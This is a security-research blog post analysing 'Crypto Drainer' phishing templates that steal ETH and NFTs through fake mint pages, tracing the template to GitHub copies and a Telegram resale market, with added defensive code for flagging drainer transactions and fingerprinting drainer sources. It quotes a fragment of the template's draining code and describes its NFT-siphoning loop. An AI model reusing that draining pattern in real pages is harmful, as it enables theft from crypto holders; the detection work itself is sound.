

 2 years ago
source link: https://blog.confiant.com/how-one-crypto-drainer-template-facilitates-tens-of-millions-of-dollars-in-theft-66f3794aea4b

How One “Crypto Drainer” Template Facilitates Tens Of Millions Of Dollars In Theft

Our previous blog provided an overview of Web3 phishing techniques and tactics, all of which continue to be relevant despite a recent economic downturn in the crypto markets. Today, we offer a deeper dive into a specific category of Web3 phishing pages called “Crypto Drainers” and one of the more prolific actors behind them. We will see how one Crypto Drainer template was responsible for over 2,000 ETH in losses in a short period of time.

Crypto Drainers are phishing pages that lure victims into signing malicious transactions that allow the attacker to siphon their crypto and NFTs. Typically these websites piggyback off of well known or emerging NFT projects. The websites themselves are primarily promoted via spam campaigns on social networks and Discord.

The way most crypto drainers work is relatively straightforward:

  • A fake NFT minting page with an artificial countdown to create urgency.
  • The victim connects their wallet in order to “mint”.
  • The page checks whether the victim’s address owns any valuable NFTs.
  • The victim signs transaction(s) that transfer ownership of those NFTs.
  • The victim sends the attacker a plain value transfer for the cost of the fake “mint”; it is not a contract interaction.
  • Rinse & repeat.

Let’s dig into a real example:

[screenshot of the malicious mint page]

hxxps://pandaverse-mint.ml/

Here’s the real website for comparison:

[screenshot of the legitimate project site]

When we look at the code under the hood of the malicious site, we find that the whole thing is templated and even ships with deployment instructions, but more on that later. For now, let’s take a peek at how this thing works.

First we have settings.js which acts as a config file. The comments are not ours, but part of the Crypto Drainer template.

And then we have index.js which includes the code responsible for the actual draining:

We won’t go over the code line by line, but it’s worth highlighting two sections in particular. First, there is this snippet from the spurious mint function, which just sends ETH from the victim to the attacker:

// The spurious "mint": a bare value transfer from the victim (walletAddress)
// to the attacker's payout address (address). No contract method is called.
web3.eth.sendTransaction({
  from: walletAddress,
  to: address,
  value: web3.utils.toWei(amount, "ether"), // the fake "mint price", in ETH
})

Remember, minting an NFT is almost always a smart contract interaction: the transaction is addressed to the collection’s contract and carries calldata (a function selector plus ABI-encoded arguments) that invokes at least one method, such as a mint function. The snippet above has no data field at all. It is a plain ETH transfer to whatever address the template’s configuration supplies, so nothing is minted; the victim simply pays the attacker.

The second snippet worth highlighting is the askNfts() function from index.js:

Looks fishy, doesn’t it? We can see how the attackers leverage the Moralis API to pull a record of the victim’s NFT ownership and then cycle through the tokens one at a time, siphoning each off to a smart contract. Not to mention that pretty damning comment:

//this is a SMART CONTRACT address, don't replace or NFTs won't come :)

The role of the smart contract address here is not entirely clear: the contract’s source code is not verified, bytecode analysis is outside the scope of this post, and this particular page has not claimed any victims, so there are no transactions to trace. It is noteworthy nonetheless, because we have examples of the exact same template moving NFTs directly to the attacker’s address rather than through an intermediate proxy contract.
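The two snippets above are exactly what a wallet, a browser extension or a transaction-signing proxy can check for before the victim signs. The following is an added example, not code from the Confiant post or from the drainer template it describes: it triages EIP-1193 eth_sendTransaction requests and flags (1) a bare ETH transfer with no calldata, which cannot be a mint, and (2) ERC-721 transferFrom / safeTransferFrom / setApprovalForAll / approve calls that hand tokens or operator rights to an address other than the signer. The ERC-721 function selectors are standard; the addresses, the “0.1 ETH mint price” and the sample requests are constructed placeholders.

```javascript
// Added example (not from the post or the template). Wallet-side triage of
// eth_sendTransaction params. Selectors are the standard ERC-721 ones.
const SELECTORS = {
  "0x23b872dd": { name: "transferFrom", types: ["address", "address", "uint256"] },
  "0x42842e0e": { name: "safeTransferFrom", types: ["address", "address", "uint256"] },
  "0xb88d4fde": { name: "safeTransferFrom", types: ["address", "address", "uint256", "bytes"] },
  "0xa22cb465": { name: "setApprovalForAll", types: ["address", "bool"] },
  "0x095ea7b3": { name: "approve", types: ["address", "uint256"] },
};

// Decode the static head of ABI-encoded calldata: one 32-byte word per argument.
// A dynamic "bytes" argument is left as its offset word; we only need addresses,
// token ids and the bool flag.
function decodeArgs(hexData, types) {
  const body = hexData.slice(10); // drop "0x" and the 4-byte selector
  return types.map((t, i) => {
    const word = body.slice(i * 64, i * 64 + 64);
    if (t === "address") return "0x" + word.slice(24).toLowerCase();
    if (t === "bool") return word.endsWith("1");
    return BigInt("0x" + (word || "0"));
  });
}

// Returns { kind, findings }: findings is a list of human-readable warnings.
function classifyTx(tx) {
  const from = tx.from.toLowerCase();
  const to = (tx.to || "").toLowerCase();
  const data = (tx.data || "0x").toLowerCase();
  const value = BigInt(tx.value || "0x0");
  const findings = [];

  if (data === "0x") {
    // No calldata means no contract method is invoked, so this is not a mint.
    if (value > 0n) findings.push(`bare ETH transfer of ${value} wei to ${to}`);
    return { kind: "value-transfer", findings };
  }

  const sel = SELECTORS[data.slice(0, 10)];
  if (!sel) return { kind: "contract-call", findings }; // e.g. a real mint(uint256)

  const args = decodeArgs(data, sel.types);
  if (sel.name === "transferFrom" || sel.name === "safeTransferFrom") {
    const [owner, recipient, tokenId] = args;
    if (owner === from && recipient !== from) {
      findings.push(`${sel.name}: token ${tokenId} of ${to} leaves the wallet to ${recipient}`);
    }
  } else if (sel.name === "setApprovalForAll" && args[1] === true) {
    findings.push(`setApprovalForAll: operator ${args[0]} gains control of every token in ${to}`);
  } else if (sel.name === "approve") {
    findings.push(`approve: ${args[0]} may take token ${args[1]} from ${to}`);
  }
  return { kind: sel.name, findings };
}

// Constructed sample requests (placeholder addresses, not real ones).
const VICTIM = "0x1111111111111111111111111111111111111111";
const ATTACKER = "0x2222222222222222222222222222222222222222";
const NFT_CONTRACT = "0x3333333333333333333333333333333333333333";
const pad = (hex) => hex.replace(/^0x/, "").padStart(64, "0");

const SAMPLES = {
  // what the template's fake mint sends: 0.1 ETH, no calldata
  fakeMint: { from: VICTIM, to: ATTACKER, value: "0x" + (10n ** 17n).toString(16) },
  // what the NFT-draining loop sends per token: transferFrom(victim, attacker, 42)
  nftDrain: { from: VICTIM, to: NFT_CONTRACT, value: "0x0",
              data: "0x23b872dd" + pad(VICTIM) + pad(ATTACKER) + pad("0x2a") },
  // the approval variant: setApprovalForAll(attacker, true)
  approvalGrab: { from: VICTIM, to: NFT_CONTRACT, value: "0x0",
                  data: "0xa22cb465" + pad(ATTACKER) + pad("0x1") },
  // a genuine mint(uint256) call that pays the contract, not a person
  realMint: { from: VICTIM, to: NFT_CONTRACT, value: "0x" + (10n ** 17n).toString(16),
              data: "0xa0712d68" + pad("0x1") },
};

for (const [label, tx] of Object.entries(SAMPLES)) {
  console.log(label, classifyTx(tx));
}
```

The check is deliberately conservative: it flags only what leaves the signer’s wallet, and it does not try to judge whether the destination contract is “the real one”, which is the question a page like pandaverse-mint.ml is designed to make the victim skip.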

In a few moments, we’ll see that we can’t take everything at face value in the world of Crypto Drainers, but for now we continue our investigation by trying out some OSINT searches to see what comes up. It’s clear as day that this is a recycled template that is likely being circulated around, so maybe we can find additional instances of it with a search on GitHub.

We do a search for askMint and come up with a treasure trove of hits:

[screenshot: GitHub code search results for askMint]

We see that the same codebase has been employed by several dozen GitHub users and hosted on GitHub Pages:
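Once a code search turns up dozens of repositories, it helps to triage the page sources mechanically rather than reading each one. The following is an added example, not code from the Confiant post or from any of the repositories it found: it scores a page source against identifiers the post shows in the template (the askMint and askNfts functions, the Moralis NFT lookup, the bare web3.eth.sendTransaction “mint” with toWei, and the “don’t replace or NFTs won’t come” comment). The threshold of three indicators and the three sample sources are constructed for the example.

```javascript
// Added example (not from the post or the template). Fingerprints page sources
// against identifiers the post shows in the drainer template.
const INDICATORS = [
  { id: "askMint", re: /\baskMint\s*\(/ },
  { id: "askNfts", re: /\baskNfts\s*\(/ },
  { id: "moralis-nft-lookup", re: /moralis/i },
  // a value-only sendTransaction whose amount is built with toWei, no contract call
  { id: "bare-sendTransaction", re: /web3\.eth\.sendTransaction\s*\(\s*\{[^}]*toWei\(/ },
  { id: "template-comment", re: /don'?t replace or NFTs won'?t come/i },
];

const MIN_SCORE = 3; // assumed threshold: three independent indicators

// Score one source; returns which indicators hit and whether it crosses the threshold.
function fingerprint(source) {
  const indicators = INDICATORS.filter((ind) => ind.re.test(source)).map((ind) => ind.id);
  return { score: indicators.length, indicators, match: indicators.length >= MIN_SCORE };
}

// Score a map of { name: source } and keep only the matches.
function fingerprintSources(sources) {
  return Object.entries(sources)
    .map(([name, src]) => ({ name, ...fingerprint(src) }))
    .filter((r) => r.match);
}

// Constructed sample sources: one drainer-style page, one ordinary mint dapp,
// one unrelated site. The drainer sample imitates the shape of the template's
// index.js described in the post; it is not the template's code.
const SAMPLE_SOURCES = {
  "fake-mint/index.js": `
    async function askMint(amount) {
      await web3.eth.sendTransaction({ from: walletAddress, to: address,
        value: web3.utils.toWei(amount, "ether") });
    }
    async function askNfts() {
      const nfts = await moralisApi.getNFTs(walletAddress); // constructed placeholder call
      for (const nft of nfts) { /* transfer each one away */ }
    }
    //this is a SMART CONTRACT address, don't replace or NFTs won't come :)
  `,
  "real-mint/app.js": `
    async function mint(qty) {
      await contract.methods.mint(qty).send({ from: account, value: price * qty });
    }
  `,
  "portfolio/main.js": `document.title = "hello";`,
};

console.log(fingerprintSources(SAMPLE_SOURCES));
```

Indicator lists like this are brittle by design, since the template is resold and edited, so treat a hit as a lead to review, not as proof; a weak single indicator such as the Moralis string on its own is why the threshold is three.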

[screenshot: GitHub Pages sites hosting the same codebase]

Each instance targets a different NFT project as well. For example, the GitHub Page above is a fake METAKAMI mint:

[screenshots: the fake METAKAMI mint page]

Things start heating up as we continue digging through the search results and land on what looks to be the original repo:

[screenshot: the repository that appears to be the original]

Eureka!

But remember when we said that everything is not as it seems in the world of Crypto Drainers? Here’s where things get interesting:

[screenshot: a GitHub user calling out the original author]

Looks like the old adage “there’s no honor among thieves” holds especially true in cybercrime: a GitHub user calls out the first author we found above as a thief who sells backdoored Crypto Drainers!

We follow the link to a Crypto Drainers group on Telegram:

[screenshot: the Crypto Drainers Telegram group]

Here we find vendors selling these Crypto Drainer templates as a full service, with full support in English and French:

[screenshot: vendor listing offering support in English and French]

There’s a demo on YouTube by the way:

And an e-commerce link where you can buy these hosted templates with white-glove service:

[screenshot: e-commerce listing for the hosted template]

Now anyone can be an NFT & crypto thief for the low cost of €1499.99!

